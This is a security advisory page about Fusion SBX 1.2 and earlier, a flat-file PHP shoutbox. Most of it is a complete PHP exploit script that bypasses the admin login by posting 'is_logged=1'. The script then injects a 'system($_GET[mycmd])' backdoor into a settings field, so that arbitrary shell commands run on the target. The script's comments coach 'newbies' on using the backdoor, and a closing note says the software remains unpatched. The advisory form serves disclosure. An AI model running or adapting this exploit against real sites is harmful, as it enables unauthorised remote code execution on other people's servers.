|
Brought to you by:
Suppliers of:
|
|
|
| |
Fusion SBX "will allow your visitors to post comments on your sites, or just say hi. And the best of all is that, it is flat-file, that means that you do not need a MySQL database to install Fusion SBX. You have complete control over the shoutout board".
A vulnerability in Fusion SBX allows remote attackers to modify the product's settings without knowing the administrator password, in addition by injecting arbitrary PHP code to one of the board's settings a remote attacker is able to cause the program to execute arbitrary code. |
| |
Credit:
The information has been provided by Dave.
|
| |
Vulnerable Systems:
* Fusion SBX version 1.2 and prior
Exploit:
<?
/*
* Fusion SBX <= 1.2 admin panel login bypass and remote-command execution exploit
* Exploit discovered 2005-5-2 in about 10 minutes of code lookover for login
* without proper details, then fooled around and found this nice remote command
* execution bug with it.
*
* This code will open a backdoor on the requested site running Fusion SBX 1.2 or
* lower, so you can just call www.site.com/sbx/index.php?mycmd=id or something.
* Newbie tip: Look in the source code after loading an attacked page for a
* properly-formatted command result that isn't all just stuffed on one line.
*
* When you execute commands using this bug, it'll give some error about headers
* already sent, but that's ok. Hacking is sometimes messy.
*
* irc.kidindustries.net #main
* dave {AT] kidindustries !DOT% net
*
* They call me Davus... Also known as Kidiot or Hook?
* NOT Dedicated to the Habbo kiddies... OK, maybe some of 'em. ;)
* Greets to Sirak, Ed, Pyxsul, and remember... CHRISSY > YOU
* SecuriTeam/
$host = "localhost";
$path = "/sbx/admin/"; // Starting and trailing slash needed
(/sbx/admin/ and such)
echo "[+] URL: http://$host$path\n";
$post =
"set2=basic&admin_set2=standard&lang2=english&plimit2=10".
"&noname2=Guest&refresh2=120&maxname2=30%3B%40system".
"%28%24_GET%5Bmycmd%5D%29&maxmess2=120&maxlink2=120".
"&wordbanning2=1&maxword2=20 "&wrapstat2=1&postorder2=1".
"&setsubmit=Commit+Changes&is_logged=1";
// Didn't trim up $post from useless variables such as the submit button, but whatever.
$req = "POST $path?settings HTTP/1.0\r\n";
$req .= "Host: $host\r\n";
$req .= "Connection: close\r\n";
$req .= "Content-Type: application/x-www-form-urlencoded\r\n";
$req .= "Content-Length: ".strlen($post)."\r\n\r\n";
$req .= $post;
echo "[+] Request built, using:\n$post\nas post data\n";
if($sck = fsockopen($host, 80)) {
echo "[+] Connected, sending request\n";
fwrite($sck, $req);
echo "[+] Request dumped to server!\n\n\n\n";
// $reply = fread($sck, 1048576); // A megabyte is MORE than enough.
// echo "[~] Server replied:\n$reply\n";
// Eh, uncomment if you wish, I just had to debug this script a bit.
fclose($sck);
echo "Now try http://$host$path?mycmd=id to see if exploit was
successful...\n";
}
else {
echo "[-] Connection failed!\n";
exit(-1); }
?>
|
| Subject:
|
Still not patched |
Date: |
22 Oct. 2005 |
| From: |
davekidindustries.net |
| Surprisingly enough, Fusion PHP still hasn't patched the code. I suppose it's a mostly abandoned project. |
|
|
|
|
|
|
